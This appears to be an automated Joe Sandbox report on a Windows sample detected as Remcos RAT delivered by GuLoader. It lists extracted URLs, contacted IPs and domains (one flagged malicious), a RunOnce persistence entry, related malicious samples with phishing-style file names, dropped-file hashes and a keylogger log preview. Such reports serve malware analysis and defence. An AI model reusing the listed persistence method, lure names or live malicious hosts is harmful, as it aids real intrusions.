              http://www.nirsoft.net | asXlZG3aW6.exe, 00000083.00000002.21826845805.0000000000193000.00000004.00000010.00020000.00000000.sdmp | false | | unknown
              https://aefd.nelreports.net/api/report?cat=bingaotak | bhv2AA3.tmp.131.dr | false | | unknown
              https://deff.nelreports.net/api/report?cat=msn | bhv2AA3.tmp.131.dr | false | | unknown
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | asXlZG3aW6.exe, 00000082.00000002.26280391623.0000000036780000.00000040.10000000.00040000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
              https://telesavers.co.za/u | asXlZG3aW6.exe, 00000082.00000002.26269410361.00000000051E8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://www.google.com/recaptcha/api2/aframe | asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://www.google.com/chrome/ | asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://www.google.com | asXlZG3aW6.exe, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
              http://o.pki.goog/wr20% | bhv2AA3.tmp.131.dr | false | | unknown
              http://geoplugin.net/json.gptn | asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567 | asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt | asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2 | asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211https://googleads.g.doubleclick.net/page | asXlZG3aW6.exe, 00000083.00000003.21822774060.0000000002262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818802197.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818734347.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21825919693.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822519040.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821545612.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822858833.0000000002267000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819075063.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819011679.000000000226D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818947265.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              http://c.pki.goog/r/r1.crl0 | bhv2AA3.tmp.131.dr | false | | unknown
              https://login.yahoo.com/config/login | asXlZG3aW6.exe | false | | unknown
              https://www.msn.com/de-ch/?ocid=iehp | asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21816817116.0000000002A81000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817130207.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0 | asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              http://www.nirsoft.net/ | asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
              https://ocsp.quovadisoffshore.com0 | asXlZG3aW6.exe, 00000082.00000003.21706373604.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21706215895.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              http://www.imvu.comata | asXlZG3aW6.exe, 00000085.00000003.21796946361.000000000049D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000003.21796891170.000000000049D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregula | bhv2AA3.tmp.131.dr | false | | unknown
              https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1 | asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmp, bhv2AA3.tmp.131.dr | false | | unknown
              https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334 | asXlZG3aW6.exe, 00000083.00000003.21818398050.000000000227D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819594967.000000000227D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                                                                      https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://www.google.com/pagead/drt/uiasXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821545612.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://geoplugin.net/json.gpgasXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.htmlasXlZG3aW6.exe, 00000083.00000003.21822380312.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821545612.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21822169342.0000000002269000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21821671607.0000000002269000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://www.imvu.com/asXlZG3aW6.exe, 00000085.00000002.21797163684.000000000019C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://i.pki.goog/r1.crt0bhv2AA3.tmp.131.drfalse
                                                                                                  unknown
                                                                                                  http://www.imvu.comasXlZG3aW6.exe, asXlZG3aW6.exe, 00000085.00000003.21796946361.000000000049D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000003.21796891170.000000000049D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://c.pki.goog/wr2/9UVbN0w5E6Y.crl0bhv2AA3.tmp.131.drfalse
                                                                                                      unknown
                                                                                                      https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://geoplugin.net/json.gpxasXlZG3aW6.exe, 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://geoplugin.net/json.gpwasXlZG3aW6.exe, 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://pki.goog/gsr1/gsr1.crt02bhv2AA3.tmp.131.drfalse
                                                                                                              unknown
                                                                                                              http://nsis.sf.net/NSIS_ErrorErrorasXlZG3aW6.exefalse
                                                                                                                unknown
                                                                                                                http://i.pki.goog/wr2.crt0bhv2AA3.tmp.131.drfalse
                                                                                                                  unknown
                                                                                                                  https://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAAasXlZG3aW6.exe, 00000083.00000003.21818802197.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818734347.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21819235993.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21818583602.0000000002A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://nsis.sf.net/NSIS_ErrorasXlZG3aW6.exefalse
                                                                                                                        unknown
                                                                                                                        https://www.msn.com/?ocid=iehpasXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21816817116.0000000002A81000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817130207.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1asXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21817489929.0000000002A81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://ib.adnxs.com/async_usersync_fileasXlZG3aW6.exe, 00000083.00000003.21819327906.0000000002261000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://www.quovadis.bm0asXlZG3aW6.exe, 00000082.00000003.21706373604.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21706215895.0000000005262000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://www.google.com/accounts/serviceloginasXlZG3aW6.exefalse
                                                                                                                                  unknown
                                                                                                                                  https://googleads.g.doubleclick.net/pagead/ads?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAAasXlZG3aW6.exe, 00000083.00000003.21818671304.0000000002A89000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://telesavers.co.za/asXlZG3aW6.exe, 00000082.00000003.21947260967.0000000005230000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000082.00000002.26269410361.00000000051E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://www.ebuddy.comasXlZG3aW6.exe, asXlZG3aW6.exe, 00000085.00000002.21797217468.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                        unknown
IP | Domain | Country | ASN | ASN Name | Malicious
102.65.21.26 | telesavers.co.za | South Africa | 328453 | Web-Africa-Networks-ASZA | false
41.216.188.178 | newfarmn.pro | South Africa | 40676 | AS40676US | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1529110
Start date and time: 2024-10-08 16:49:22 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 17m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of new started processes analysed: 134
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: asXlZG3aW6.exe
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@405/13@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 173
• Number of non-executed functions: 322
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: asXlZG3aW6.exe
Time | Type | Description
10:53:03 | API Interceptor | 24128134x Sleep call for process: asXlZG3aW6.exe modified
16:52:21 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Lunendes C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scr
16:52:30 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Lunendes C:\Users\user\AppData\Local\Temp\Overskuelighedsgrunde\Uforsvarlige.scr
Match | Associated Sample Name / URL | Detection | Threat Name | Context
102.65.21.26 | z1Quotation.scr.exe | malicious | Remcos, GuLoader |
102.65.21.26 | X8VbtniLpf.exe | malicious | Remcos, GuLoader |
102.65.21.26 | rSignedApprovedQuotation.exe | malicious | AgentTesla, GuLoader |
178.237.33.50 | Maersk BL, IN & PL.xls | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | QPS-36477.xls | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | zYJYK66EGb.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | ordin de plat#U0103.docx | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | ISF 10+2 - SO - SO 4042 - ROTHENBERGER USA, INC#U51fa#U8ca8 TWSE0211390.scr.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 1728373206596a852cdbe7ae697de423fbd80cabe33d7a6a584032b72164b61e0692c12d1a849.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | SWIFT 103 202410071519130850 071024.pdf.vbs | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Salary Increase Letter_Oct 2024.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | September Report 24'.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | SecuriteInfo.com.FileRepMalware.12793.28433.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| telesavers.co.za | Quotation.scr.exe | malicious | GuLoader | 102.65.21.26 |
| | Purchase Order 098922.scr.exe | malicious | GuLoader | 102.65.21.26 |
| | Quotation.scr | malicious | GuLoader | 102.65.21.26 |
| | z1Quotation.scr.exe | malicious | Remcos, GuLoader | 102.65.21.26 |
| | X8VbtniLpf.exe | malicious | Remcos, GuLoader | 102.65.21.26 |
| newfarmn.pro | disputants stiftsfrkens.exe | malicious | Remcos, GuLoader | 147.124.212.185 |
| geoplugin.net | Maersk BL, IN & PL.xls | malicious | Remcos | 178.237.33.50 |
| | QPS-36477.xls | malicious | Remcos | 178.237.33.50 |
| | zYJYK66EGb.exe | malicious | Remcos | 178.237.33.50 |
| | ordin de plat#U0103.docx | malicious | Remcos | 178.237.33.50 |
| | ISF 10+2 - SO - SO 4042 - ROTHENBERGER USA, INC#U51fa#U8ca8 TWSE0211390.scr.exe | malicious | Remcos | 178.237.33.50 |
| | 1728373206596a852cdbe7ae697de423fbd80cabe33d7a6a584032b72164b61e0692c12d1a849.dat-decoded.exe | malicious | Remcos | 178.237.33.50 |
| | SWIFT 103 202410071519130850 071024.pdf.vbs | malicious | Remcos | 178.237.33.50 |
| | Salary Increase Letter_Oct 2024.vbs | malicious | Remcos, GuLoader | 178.237.33.50 |
| | September Report 24'.vbs | malicious | Remcos, GuLoader | 178.237.33.50 |
| | SecuriteInfo.com.FileRepMalware.12793.28433.exe | malicious | Remcos, GuLoader | 178.237.33.50 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| AS40676US | na.elf | malicious | Unknown | 103.59.110.254 |
| | na.elf | malicious | Mirai | 23.179.109.45 |
| | sora.arm.elf | malicious | Mirai | 43.250.74.236 |
| | na.elf | malicious | Mirai, Okiru | 107.169.197.220 |
| | d1bc91bd44a0.exe | malicious | PrivateLoader, Stealc, Vidar | 41.216.188.190 |
| | 66fb252fe232b_Patksl.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 41.216.188.190 |
| | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 41.216.188.190 |
| | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | 41.216.188.190 |
| | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz | 41.216.188.190 |
| | kz6TUdxXIS.lnk | malicious | Unknown | 45.61.139.69 |
| Web-Africa-Networks-ASZA | z1Quotation.scr.exe | malicious | Remcos, GuLoader | 102.65.21.26 |
| | X8VbtniLpf.exe | malicious | Remcos, GuLoader | 102.65.21.26 |
| | m68k.elf | malicious | Mirai, Moobot | 102.65.164.138 |
| | x86.elf | malicious | Unknown | 102.65.186.72 |
| | Uw0VH7yLVB.elf | malicious | Mirai | 102.65.222.253 |
| | rSignedApprovedQuotation.exe | malicious | AgentTesla, GuLoader | 102.65.21.26 |
| | http://packages.mpinsureit.com/ | malicious | Unknown | 102.65.21.13 |
| | jew.arm.elf | malicious | Unknown | 102.65.73.255 |
| | https://www.packages.mpinsureit.com/ | malicious | Unknown | 102.65.21.13 |
| | N2lCCQIbyW.elf | malicious | Mirai | 102.65.252.110 |
| ATOM86-ASATOM86NL | Maersk BL, IN & PL.xls | malicious | Remcos | 178.237.33.50 |
| | QPS-36477.xls | malicious | Remcos | 178.237.33.50 |
| | zYJYK66EGb.exe | malicious | Remcos | 178.237.33.50 |
| | ordin de plat#U0103.docx | malicious | Remcos | 178.237.33.50 |
| | ISF 10+2 - SO - SO 4042 - ROTHENBERGER USA, INC#U51fa#U8ca8 TWSE0211390.scr.exe | malicious | Remcos | 178.237.33.50 |
| | 1728373206596a852cdbe7ae697de423fbd80cabe33d7a6a584032b72164b61e0692c12d1a849.dat-decoded.exe | malicious | Remcos | 178.237.33.50 |
| | SWIFT 103 202410071519130850 071024.pdf.vbs | malicious | Remcos | 178.237.33.50 |
| | Salary Increase Letter_Oct 2024.vbs | malicious | Remcos, GuLoader | 178.237.33.50 |
| | September Report 24'.vbs | malicious | Remcos, GuLoader | 178.237.33.50 |
| | SecuriteInfo.com.FileRepMalware.12793.28433.exe | malicious | Remcos, GuLoader | 178.237.33.50 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| 37f463bf4616ecd445d4a1937da06e19 | 15PylGQjzK.exe | malicious | LummaC, Vidar | 102.65.21.26 |
| | Ji7kZhlqxz.exe | malicious | LummaC, Vidar | 102.65.21.26 |
| | Update.js | malicious | NetSupport RAT | 102.65.21.26 |
| | file.exe | malicious | Clipboard Hijacker, Stealc, Vidar | 102.65.21.26 |
| | file.exe | malicious | LummaC, Vidar | 102.65.21.26 |
| | Transferencia 10-7-2024.exe | malicious | FormBook, GuLoader | 102.65.21.26 |
| | ZAMOWIEN.EXE.exe | malicious | AgentTesla, GuLoader | 102.65.21.26 |
| | ZAMOWIEN.EXE.exe | malicious | AgentTesla, GuLoader | 102.65.21.26 |
| | Contrato de Cesin de Crditos Sin Recurso.exe | malicious | GuLoader, Snake Keylogger | 102.65.21.26 |
| | 7AeSqNv1rC.exe | malicious | MicroClip, Vidar | 102.65.21.26 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\nsExec.dll | Shipping documents 000288488599900.img | malicious | GuLoader | |
| | Zincize.exe | malicious | GuLoader | |
| | Zincize.exe | malicious | GuLoader | |
| | r14836901-5B4A-.exe | malicious | FormBook, GuLoader | |
| | r14836901-5B4A-.exe | malicious | GuLoader | |
| | Bootblacks.exe | malicious | FormBook, GuLoader | |
| | Bootblacks.exe | malicious | GuLoader | |
| | Halkbank_Ekstre_06535798_98742134.pdf.exe | malicious | AgentTesla, GuLoader | |
| | Halkbank_Ekstre_87762122_97575533.pdf.exe | malicious | AgentTesla, GuLoader | |
| C:\Users\user\AppData\Local\Temp\nsa33B1.tmp\System.dll | aMfizaMilo.exe | malicious | GuLoader | |
| | 1ppvR5VRT6.exe | malicious | GuLoader | |
| | Ozb8aojWew.exe | malicious | GuLoader | |
| | aMfizaMilo.exe | malicious | GuLoader | |
| | 1ppvR5VRT6.exe | malicious | GuLoader | |
| | Ozb8aojWew.exe | malicious | GuLoader | |
| | Documents.com.exe | malicious | GuLoader | |
| | Documents.com.exe | malicious | GuLoader | |
| | 27062024-322copy.exe | malicious | GuLoader | |
Process: C:\Users\user\Desktop\asXlZG3aW6.exe
File Type: data
Category: dropped
Size (bytes): 318
Entropy (8bit): 3.4358769940070504
Encrypted: false
SSDEEP: 6:6lJENhU65YcIeeDAlOWA7DxbN2f0JMm0wiDxbN2f1l5m0v:6lJRKec0WItN2sCy4tN2X5l
MD5: 79AAD3264FEE72970A9514AB1C37887B
SHA1: 2AAE7CBA25CD298C9C578046B73E6DB4EBCF90D8
SHA-256: D900286B60A2524855095616391E76E1AF6AC9864894ADEACBE3C7970E6D3534
SHA-512: E7651F296737312F2ADEEAC4017DB2D2A111B6F4BD49A6AAFD14300A9110D6E1A0BF0578784A5561CC67AE42F245E55E41913C691CDE69B503F025BAECAEC561
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Preview: ....[.2.0.2.4./.1.0./.0.8. .1.0.:.5.2.:.3.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .6.9.7.3.1. .m.i.n.u.t.e.s. .}.........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .3.0.7.4. .m.i.n.u.t.e.s. .}.....
Process: C:\Users\user\Desktop\asXlZG3aW6.exe
File Type: JSON data
Category: dropped
Size (bytes): 965
Entropy (8bit): 5.024475803838093
Encrypted: false
SSDEEP: 12:tkand6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7Pp:qWdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5: 1248EFE6D7B68E85F0BDE33C78EB0D90
SHA1: D4DDAFF20ED36C3BA8372A9F784B69251C4C2D87
SHA-256: 58DEEFC66C61E91740378E06D897DC45E2EA460CFD85A853E1D3CEEA7340EC10
SHA-512: 0151AA39AE65D1555868AF4E5CCD3F50A733D8B954F0F03132DECA0C8D335803ACB06910CFB649F9509192BE40332DAEC853108C211896D149AF5D540D5F2FA4
Malicious: false
